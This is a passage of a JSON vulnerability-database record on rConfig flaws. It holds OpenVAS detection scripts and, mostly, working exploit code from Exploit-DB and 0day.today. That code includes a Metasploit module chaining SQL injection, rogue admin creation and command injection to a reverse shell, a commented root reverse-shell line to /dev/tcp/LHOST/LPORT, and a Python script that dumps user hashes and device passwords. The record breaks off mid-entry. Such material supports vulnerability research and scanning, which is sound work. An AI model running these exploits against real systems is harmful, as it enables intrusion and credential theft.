fixed_version: \"None\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-05-12T15:40:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-10220"], "description": "rConfig is prone to an SQL injection (SQLi) vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2020-03-09T00:00:00", "id": "OPENVAS:1361412562310113651", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113651", "type": "openvas", "title": "rConfig <= 3.9.4 SQLi Vulnerability", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113651\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-09 14:56:57 +0200 (Mon, 09 Mar 2020)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"solution_type\", value:\"NoneAvailable\");\n\n script_cve_id(\"CVE-2020-10220\");\n\n script_name(\"rConfig <= 3.9.4 SQLi Vulnerability\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rconfig_detect.nasl\");\n script_mandatory_keys(\"rconfig/detected\");\n\n script_tag(name:\"summary\", value:\"rConfig is prone to an SQL injection (SQLi) vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Tries to execute an SQL query on the target system.\");\n\n script_tag(name:\"insight\", value:\"The vulnerability is exploitable via the searchColumn parameter in commands.inc.php.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to read sensitive information\n and execute arbitrary code on the target machine.\");\n\n script_tag(name:\"affected\", value:\"rConfig through version 3.9.4.\");\n\n script_tag(name:\"solution\", value:\"No known solution is available as of 09th March, 2020.\n Information regarding this issue will be updated once solution details are available.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_sqli.py\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:rconfig:rconfig\";\n\ninclude( \"host_details.inc\" );\ninclude( \"misc_func.inc\" );\ninclude( \"http_func.inc\" );\ninclude( \"http_keepalive.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) )\n exit( 0 );\n\nif( ! location = get_app_location( cpe: CPE, port: port ) )\n exit( 0 );\n\nif( location == \"/\" )\n location = \"\";\n\nvt_strings = get_vt_strings();\n\nattack_url = location + \"/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%200x\" + toupper( vt_strings[\"default_rand_hex\"] ) + \",NULL--\";\nreq = http_get( port: port, item: attack_url );\nres = http_keepalive_send_recv( port: port, data: req, bodyonly: FALSE );\n\nif( res =~ 'id=\"' + vt_strings[\"default_rand\"] + '\"' ) {\n report = 'It was possible to execute an SQL command.\\n';\n report += http_report_vuln_url( port: port, url: attack_url );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-20T15:43:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-10221", "CVE-2020-10220"], "description": "rConfig is prone to multiple vulnerabilities.", "modified": "2020-05-19T00:00:00", "published": "2020-03-10T00:00:00", "id": "OPENVAS:1361412562310113649", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113649", "type": "openvas", "title": "rConfig < 3.9.5 Multiple Vulnerabilities", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113649\");\n script_version(\"2020-05-19T04:50:37+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-19 04:50:37 +0000 (Tue, 19 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-10 10:14:38 +0000 (Tue, 10 Mar 2020)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2020-10220\", \"CVE-2020-10221\");\n\n script_name(\"rConfig < 3.9.5 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rconfig_detect.nasl\");\n script_mandatory_keys(\"rconfig/detected\");\n\n script_tag(name:\"summary\", value:\"rConfig is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - The web interface is prone to an SQL injection via\n the searchColumn parameter of the commands.inc.php page.\n\n - lib/ajaxHandlers/ajaxAddTemplate.php allows remote attackers\n to execute arbitrary OS commands via shell metacharacters\n in the fileName POST parameter.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to\n gain complete control over the target system.\");\n\n script_tag(name:\"affected\", value:\"rConfig through version 3.9.4.\");\n\n script_tag(name:\"solution\", value:\"Update to version 3.9.5 or later.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_sqli.py\");\n script_xref(name:\"URL\", value:\"https://engindemirbilek.github.io/rconfig-3.93-rce\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:rconfig:rconfig\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) ) exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_is_less_equal( version: version, test_version: \"3.9.4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.9.5\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2020-03-17T13:43:10", "description": "", "published": "2020-03-17T00:00:00", "type": "exploitdb", "title": "Rconfig 3.x - Chained Remote Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220", "CVE-2019-19509"], "modified": "2020-03-17T00:00:00", "id": "EDB-ID:48223", "href": "https://www.exploit-db.com/exploits/48223", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Rconfig 3.x Chained Remote Code Execution',\r\n 'Description' => '\r\n This module exploits multiple vulnerabilities in rConfig version 3.9\r\n in order to execute arbitrary commands.\r\n This module takes advantage of a command injection vulnerability in the\r\n `path` parameter of the ajax archive file functionality within the rConfig web\r\n interface in order to execute the payload.\r\n Valid credentials for a user with administrative privileges are required.\r\n However, this module can bypass authentication via SQLI.\r\n This module has been successfully tested on Rconfig 3.9.3 and 3.9.4.\r\n The steps are:\r\n 1. SQLi on /commands.inc.php allows us to add an administrative user.\r\n 2. An authenticated session is established with the newly added user\r\n 3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to\r\n execute the payload.\r\n 4. Remove the added admin user.\r\n Tips : once you get a shell, look at the CVE-2019-19585.\r\n You will probably get root because rConfig install script add Apache user to\r\n sudoers with nopasswd ;-)\r\n ',\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Jean-Pascal Thomas', # @vikingfr - Discovery, exploit and Metasploit module\r\n 'Orange Cyberdefense' # Module tests - greetz : CSR-SO team (https://cyberdefense.orange.com/)\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2019-19509'], # authenticated rce\r\n ['CVE', '2020-10220'], # sqli auth bypass\r\n %w[EDB 47982],\r\n %w[EDB 48208],\r\n ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py'], # authenticated RCE\r\n ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py'] # unauthenticated SQLi\r\n ],\r\n 'Platform' => %w[unix linux],\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' => [['Auto', {}]],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => '2020-03-11',\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true, # HTTPS is required for the module to work because the rConfig php code handle http to https redirects\r\n 'PAYLOAD' => 'generic/shell_reverse_tcp'\r\n },\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptString.new('TARGETURI', [true, 'Base path to Rconfig', '/'])\r\n ]\r\n end\r\n\r\n # CHECK IF RCONFIG IS REACHABLE AND INSTALLED\r\n def check\r\n vprint_status 'STEP 0: Get rConfig version...'\r\n res = send_request_cgi!(\r\n 'method' => 'GET',\r\n 'uri' => '/login.php'\r\n )\r\n if !res || !res.get_html_document\r\n fail_with(Failure::Unknown, 'Could not check rConfig version')\r\n end\r\n if res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 'rConfig Version 3.9'\r\n print_good('rConfig version 3.9 detected')\r\n return Exploit::CheckCode::Appears\r\n elsif res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 'rConfig'\r\n print_status('rConfig detected, but not version 3.9')\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n\r\n # CREATE AN ADMIN USER IN RCONFIG\r\n def create_rconfig_user(user, _password)\r\n vprint_status 'STEP 1 : Adding a temporary admin user...'\r\n fake_id = Rex::Text.rand_text_numeric(3)\r\n fake_pass = Rex::Text.rand_text_alpha(10)\r\n fake_pass_md5 = '21232f297a57a5a743894a0e4a801fc3' # hash of 'admin'\r\n fake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d'\r\n userleveladmin = 9 # Administrator\r\n user_sqli = \"command ; INSERT INTO `users` (`id`,`username`,`password`,`userid`,`userlevel`,`email`,`timestamp`,`status`) VALUES (#{fake_id},'#{user}','#{fake_pass_md5}','#{fake_userid_md5}',#{userleveladmin}, '#{user}@domain.com', 1346920339, 1);--\"\r\n sqli_res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),\r\n 'method' => 'GET',\r\n 'vars_get' => {\r\n 'search' => 'search',\r\n 'searchOption' => 'contains',\r\n 'searchField' => 'vuln',\r\n 'searchColumn' => user_sqli\r\n }\r\n )\r\n unless sqli_res\r\n print_warning('Failed to create user: Connection failed.')\r\n return\r\n end\r\n print_good \"New temporary user #{user} created\"\r\n end\r\n\r\n # AUTHENTICATE ON RCONFIG\r\n def login(user, pass)\r\n vprint_status \"STEP 2: Authenticating as #{user} ...\"\r\n # get session cookie (PHPSESSID)\r\n res = send_request_cgi!(\r\n 'method' => 'GET',\r\n 'uri' => '/login.php'\r\n )\r\n @cookie = res.get_cookies\r\n if @cookie.empty?\r\n fail_with Failure::UnexpectedReply, 'Failed to retrieve cookies'\r\n return\r\n end\r\n # authenticate\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'),\r\n 'cookie' => @cookie,\r\n 'vars_post' => {\r\n pass: pass,\r\n user: user,\r\n sublogin: 1\r\n }\r\n )\r\n unless res\r\n print_warning('Failed to authenticate: Connection failed.')\r\n return\r\n end\r\n print_good \"Authenticated as user #{user}\"\r\n end\r\n\r\n def trigger_rce(cmd, _opts = {})\r\n vprint_status \"STEP 3: Executing the command (#{cmd})\"\r\n trigger = \"`#{cmd} #`\"\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxArchiveFiles.php'),\r\n 'cookie' => @cookie,\r\n 'vars_get' => {\r\n 'path' => trigger,\r\n 'ext' => 'random'\r\n }\r\n )\r\n # the page hangs because of the command being executed, so we can't expect HTTP response\r\n # unless res\r\n # fail_with Failure::Unreachable, 'Remote Code Execution failed: Connection failed'\r\n # return\r\n # end\r\n # unless res.body.include? '\"success\":true'\r\n # fail_with Failure::Unknown, 'It seems that the code was not executed'\r\n # return\r\n # end\r\n print_good 'Command sucessfully executed'\r\n end\r\n\r\n # DELETE A USER\r\n def delete_rconfig_user(user)\r\n vprint_status 'STEP 4 : Removing the temporary admin user...'\r\n del_sqli = \"command ; DELETE FROM `users` WHERE `username`='#{user}';--\"\r\n del_res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),\r\n 'method' => 'GET',\r\n 'vars_get' => {\r\n 'search' => 'search',\r\n 'searchOption' => 'contains',\r\n 'searchField' => 'vuln',\r\n 'searchColumn' => del_sqli\r\n }\r\n )\r\n unless del_res\r\n print_warning \"Removing user #{user} failed: Connection failed. Please remove it manually.\"\r\n return\r\n end\r\n print_status \"User #{user} removed successfully !\"\r\n end\r\n\r\n def cleanup\r\n super\r\n delete_rconfig_user @username if @username\r\n end\r\n\r\n def exploit\r\n check\r\n @username = rand_text_alphanumeric(8..12)\r\n @password = 'admin'\r\n create_res = create_rconfig_user @username, @password\r\n login(@username, @password)\r\n tmp_txt_file = Rex::Text.rand_text_alpha(10)\r\n tmp_zip_file = Rex::Text.rand_text_alpha(10)\r\n # The following payload (cf. 2019-19585) can be used to get root rev shell, but some payloads failed to execute (ex : because of quotes stuffs). Too bad :-(\r\n # trigger_rce(\"touch /tmp/#{tmp_txt_file}.txt;sudo zip -q /tmp/#{tmp_zip_file}.zip /tmp/#{tmp_txt_file}.txt -T -TT '/bin/sh -i>& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 #'\")\r\n trigger_rce(payload.encoded.to_s)\r\n end\r\nend", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48223"}, {"lastseen": "2020-03-12T13:37:19", "description": "", "published": "2020-03-12T00:00:00", "type": "exploitdb", "title": "rConfig 3.9 - &#039;searchColumn&#039; SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220"], "modified": "2020-03-12T00:00:00", "id": "EDB-ID:48208", "href": "https://www.exploit-db.com/exploits/48208", "sourceData": "# Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection\r\n# Exploit Author: vikingfr\r\n# Date: 2020-03-03\r\n# CVE-2020-10220\r\n# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py\r\n# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)\r\n# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip\r\n# Install scripts : \r\n# https://www.rconfig.com/downloads/scripts/install_rConfig.sh\r\n# https://www.rconfig.com/downloads/scripts/centos7_install.sh\r\n# https://www.rconfig.com/downloads/scripts/centos6_install.sh\r\n# Version: tested v3.9.4\r\n# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24\r\n#\r\n# Notes : If you want to reproduce in your lab environment follow those links :\r\n# http://help.rconfig.com/gettingstarted/installation\r\n# then\r\n# http://help.rconfig.com/gettingstarted/postinstall\r\n#\r\n# $ python3 rconfig_sqli.py https://1.1.1.1\r\n# rconfig 3.9 - SQL Injection PoC\r\n# [+] Triggering the payloads on https://1.1.1.1/commands.inc.php\r\n# [+] Extracting the current DB name :\r\n# rconfig2\r\n# [+] Extracting 10 first users :\r\n# admin:1:63a9f0ea7bb98050796b649e85481845\r\n# Maybe no more information ?\r\n# Maybe no more information ?\r\n# [snip]\r\n# [+] Extracting 10 first devices :\r\n# 127-0-0-1:127.0.0.1::ocdvulnpass:\r\n# deviceTestName:1.1.1.1:myusertest:mysecret:myenablesecret\r\n# Maybe no more information ?\r\n# Maybe no more information ?\r\n# [snip]\r\n# Done\r\n \r\n\r\n#!/usr/bin/python3\r\nimport requests\r\nimport sys\r\nimport urllib.parse\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\nprint (\"rconfig 3.9 - SQL Injection PoC\")\r\nif len(sys.argv) != 2:\r\n print (\"[+] Usage : ./rconfig_exploit.py https://target\")\r\n exit()\r\n\r\nvuln_page=\"/commands.inc.php\"\r\nvuln_parameters=\"?searchOption=contains&searchField=vuln&search=search&searchColumn=command\"\r\ngiven_target = sys.argv[1]\r\ntarget = given_target\r\ntarget += vuln_page\r\ntarget += vuln_parameters\r\n\r\nrequest = requests.session()\r\ndashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False)\r\n\r\n\r\ndef extractDBinfos(myTarget=None,myPayload=None):\r\n\t\"\"\"\r\n\tExtract information from database\r\n\tArgs:\r\n\t\t- target+payload (String)\r\n\tReturns:\r\n\t\t- payload result (String)\r\n\t\"\"\"\r\n\tresult = \"\"\r\n\tencoded_request = myTarget+myPayload\r\n\texploit_req = request.get(encoded_request)\r\n\tif '[PWN]' in str(exploit_req.content):\r\n\t\tresult = str(exploit_req.content).split('[PWN]')[1]\r\n\telse:\r\n\t\tresult=\"Maybe no more information ?\"\r\n\t\r\n\treturn result\r\n\r\n\r\nif dashboard_request.status_code != 404:\r\n\tprint (\"[+] Triggering the payloads on \"+given_target+vuln_page)\r\n\t# get the db name\r\n\tprint (\"[+] Extracting the current DB name :\")\r\n\tdb_payload = \"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--\"\r\n\tdb_name = extractDBinfos(target,db_payload)\r\n\tprint (db_name)\r\n # DB extract users\r\n\tprint (\"[+] Extracting 10 first users :\")\r\n\tfor i in range (0, 10):\r\n user1_payload=\"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20\"+db_name+\".users+limit+\"+str(i)+\",\"+str(i+1)+\"),NULL--\"\r\n user_h = extractDBinfos(target,user1_payload)\r\n #print (\"[+] Dump device \"+str(i))\r\n print (user_h)\r\n # DB extract devices information\r\n\tprint (\"[+] Extracting 10 first devices :\")\r\n\tfor i in range (0, 10):\r\n device_payload=\"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20\"+db_name+\".nodes+limit+\"+str(i)+\",\"+str(i+1)+\"),NULL--\"\r\n device_h = extractDBinfos(target,device_payload)\r\n #print (\"[+] Dump device \"+str(i))\r\n print (device_h)\r\n \r\n\tprint (\"Done\")\r\n\t \r\nelse:\r\n print (\"[-] Please verify the URI\")\r\n exit()", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/48208"}], "zdt": [{"lastseen": "2020-03-17T11:09:30", "description": "This Metasploit module takes advantage of a command injection vulnerability in the path parameter of the ajax archive file functionality within the rConfig web interface in order to execute the payload. Valid credentials for a user with administrative privileges are required . However, this module can bypass authentication via SQL injection.", "edition": 1, "published": "2020-03-17T00:00:00", "title": "Rconfig 3.x Chained Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220", "CVE-2019-19509"], "modified": "2020-03-17T00:00:00", "id": "1337DAY-ID-34104", "href": "https://0day.today/exploit/description/34104", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Rconfig 3.x Chained Remote Code Execution',\r\n 'Description' => '\r\n This module exploits multiple vulnerabilities in rConfig version 3.9\r\n in order to execute arbitrary commands.\r\n This module takes advantage of a command injection vulnerability in the\r\n `path` parameter of the ajax archive file functionality within the rConfig web\r\n interface in order to execute the payload.\r\n Valid credentials for a user with administrative privileges are required.\r\n However, this module can bypass authentication via SQLI.\r\n This module has been successfully tested on Rconfig 3.9.3 and 3.9.4.\r\n The steps are:\r\n 1. SQLi on /commands.inc.php allows us to add an administrative user.\r\n 2. An authenticated session is established with the newly added user\r\n 3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to\r\n execute the payload.\r\n 4. Remove the added admin user.\r\n Tips : once you get a shell, look at the CVE-2019-19585.\r\n You will probably get root because rConfig install script add Apache user to\r\n sudoers with nopasswd ;-)\r\n ',\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Jean-Pascal Thomas', # @vikingfr - Discovery, exploit and Metasploit module\r\n 'Orange Cyberdefense' # Module tests - greetz : CSR-SO team (https://cyberdefense.orange.com/)\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2019-19509'], # authenticated rce\r\n ['CVE', '2020-10220'], # sqli auth bypass\r\n %w[EDB 47982],\r\n %w[EDB 48208],\r\n ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py'], # authenticated RCE\r\n ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py'] # unauthenticated SQLi\r\n ],\r\n 'Platform' => %w[unix linux],\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' => [['Auto', {}]],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => '2020-03-11',\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true, # HTTPS is required for the module to work because the rConfig php code handle http to https redirects\r\n 'PAYLOAD' => 'generic/shell_reverse_tcp'\r\n },\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptString.new('TARGETURI', [true, 'Base path to Rconfig', '/'])\r\n ]\r\n end\r\n\r\n # CHECK IF RCONFIG IS REACHABLE AND INSTALLED\r\n def check\r\n vprint_status 'STEP 0: Get rConfig version...'\r\n res = send_request_cgi!(\r\n 'method' => 'GET',\r\n 'uri' => '/login.php'\r\n )\r\n if !res || !res.get_html_document\r\n fail_with(Failure::Unknown, 'Could not check rConfig version')\r\n end\r\n if res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 'rConfig Version 3.9'\r\n print_good('rConfig version 3.9 detected')\r\n return Exploit::CheckCode::Appears\r\n elsif res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 'rConfig'\r\n print_status('rConfig detected, but not version 3.9')\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n\r\n # CREATE AN ADMIN USER IN RCONFIG\r\n def create_rconfig_user(user, _password)\r\n vprint_status 'STEP 1 : Adding a temporary admin user...'\r\n fake_id = Rex::Text.rand_text_numeric(3)\r\n fake_pass = Rex::Text.rand_text_alpha(10)\r\n fake_pass_md5 = '21232f297a57a5a743894a0e4a801fc3' # hash of 'admin'\r\n fake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d'\r\n userleveladmin = 9 # Administrator\r\n user_sqli = \"command ; INSERT INTO `users` (`id`,`username`,`password`,`userid`,`userlevel`,`email`,`timestamp`,`status`) VALUES (#{fake_id},'#{user}','#{fake_pass_md5}','#{fake_userid_md5}',#{userleveladmin}, '#{user}@domain.com', 1346920339, 1);--\"\r\n sqli_res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),\r\n 'method' => 'GET',\r\n 'vars_get' => {\r\n 'search' => 'search',\r\n 'searchOption' => 'contains',\r\n 'searchField' => 'vuln',\r\n 'searchColumn' => user_sqli\r\n }\r\n )\r\n unless sqli_res\r\n print_warning('Failed to create user: Connection failed.')\r\n return\r\n end\r\n print_good \"New temporary user #{user} created\"\r\n end\r\n\r\n # AUTHENTICATE ON RCONFIG\r\n def login(user, pass)\r\n vprint_status \"STEP 2: Authenticating as #{user} ...\"\r\n # get session cookie (PHPSESSID)\r\n res = send_request_cgi!(\r\n 'method' => 'GET',\r\n 'uri' => '/login.php'\r\n )\r\n @cookie = res.get_cookies\r\n if @cookie.empty?\r\n fail_with Failure::UnexpectedReply, 'Failed to retrieve cookies'\r\n return\r\n end\r\n # authenticate\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'),\r\n 'cookie' => @cookie,\r\n 'vars_post' => {\r\n pass: pass,\r\n user: user,\r\n sublogin: 1\r\n }\r\n )\r\n unless res\r\n print_warning('Failed to authenticate: Connection failed.')\r\n return\r\n end\r\n print_good \"Authenticated as user #{user}\"\r\n end\r\n\r\n def trigger_rce(cmd, _opts = {})\r\n vprint_status \"STEP 3: Executing the command (#{cmd})\"\r\n trigger = \"`#{cmd} #`\"\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxArchiveFiles.php'),\r\n 'cookie' => @cookie,\r\n 'vars_get' => {\r\n 'path' => trigger,\r\n 'ext' => 'random'\r\n }\r\n )\r\n # the page hangs because of the command being executed, so we can't expect HTTP response\r\n # unless res\r\n # fail_with Failure::Unreachable, 'Remote Code Execution failed: Connection failed'\r\n # return\r\n # end\r\n # unless res.body.include? '\"success\":true'\r\n # fail_with Failure::Unknown, 'It seems that the code was not executed'\r\n # return\r\n # end\r\n print_good 'Command sucessfully executed'\r\n end\r\n\r\n # DELETE A USER\r\n def delete_rconfig_user(user)\r\n vprint_status 'STEP 4 : Removing the temporary admin user...'\r\n del_sqli = \"command ; DELETE FROM `users` WHERE `username`='#{user}';--\"\r\n del_res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),\r\n 'method' => 'GET',\r\n 'vars_get' => {\r\n 'search' => 'search',\r\n 'searchOption' => 'contains',\r\n 'searchField' => 'vuln',\r\n 'searchColumn' => del_sqli\r\n }\r\n )\r\n unless del_res\r\n print_warning \"Removing user #{user} failed: Connection failed. Please remove it manually.\"\r\n return\r\n end\r\n print_status \"User #{user} removed successfully !\"\r\n end\r\n\r\n def cleanup\r\n super\r\n delete_rconfig_user @username if @username\r\n end\r\n\r\n def exploit\r\n check\r\n @username = rand_text_alphanumeric(8..12)\r\n @password = 'admin'\r\n create_res = create_rconfig_user @username, @password\r\n login(@username, @password)\r\n tmp_txt_file = Rex::Text.rand_text_alpha(10)\r\n tmp_zip_file = Rex::Text.rand_text_alpha(10)\r\n # The following payload (cf. 2019-19585) can be used to get root rev shell, but some payloads failed to execute (ex : because of quotes stuffs). Too bad :-(\r\n # trigger_rce(\"touch /tmp/#{tmp_txt_file}.txt;sudo zip -q /tmp/#{tmp_zip_file}.zip /tmp/#{tmp_txt_file}.txt -T -TT '/bin/sh -i>& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 #'\")\r\n trigger_rce(payload.encoded.to_s)\r\n end\r\nend\n\n# 0day.today [2020-03-17] #", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34104"}, {"lastseen": "2020-02-02T19:04:27", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2020-01-30T00:00:00", "title": "rConfig 3.9.3 - Authenticated Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19509"], "modified": "2020-01-30T00:00:00", "id": "1337DAY-ID-33879", "href": "https://0day.today/exploit/description/33879", "sourceData": "# Exploit Title: rConfig 3.9.3 - Authenticated Remote Code 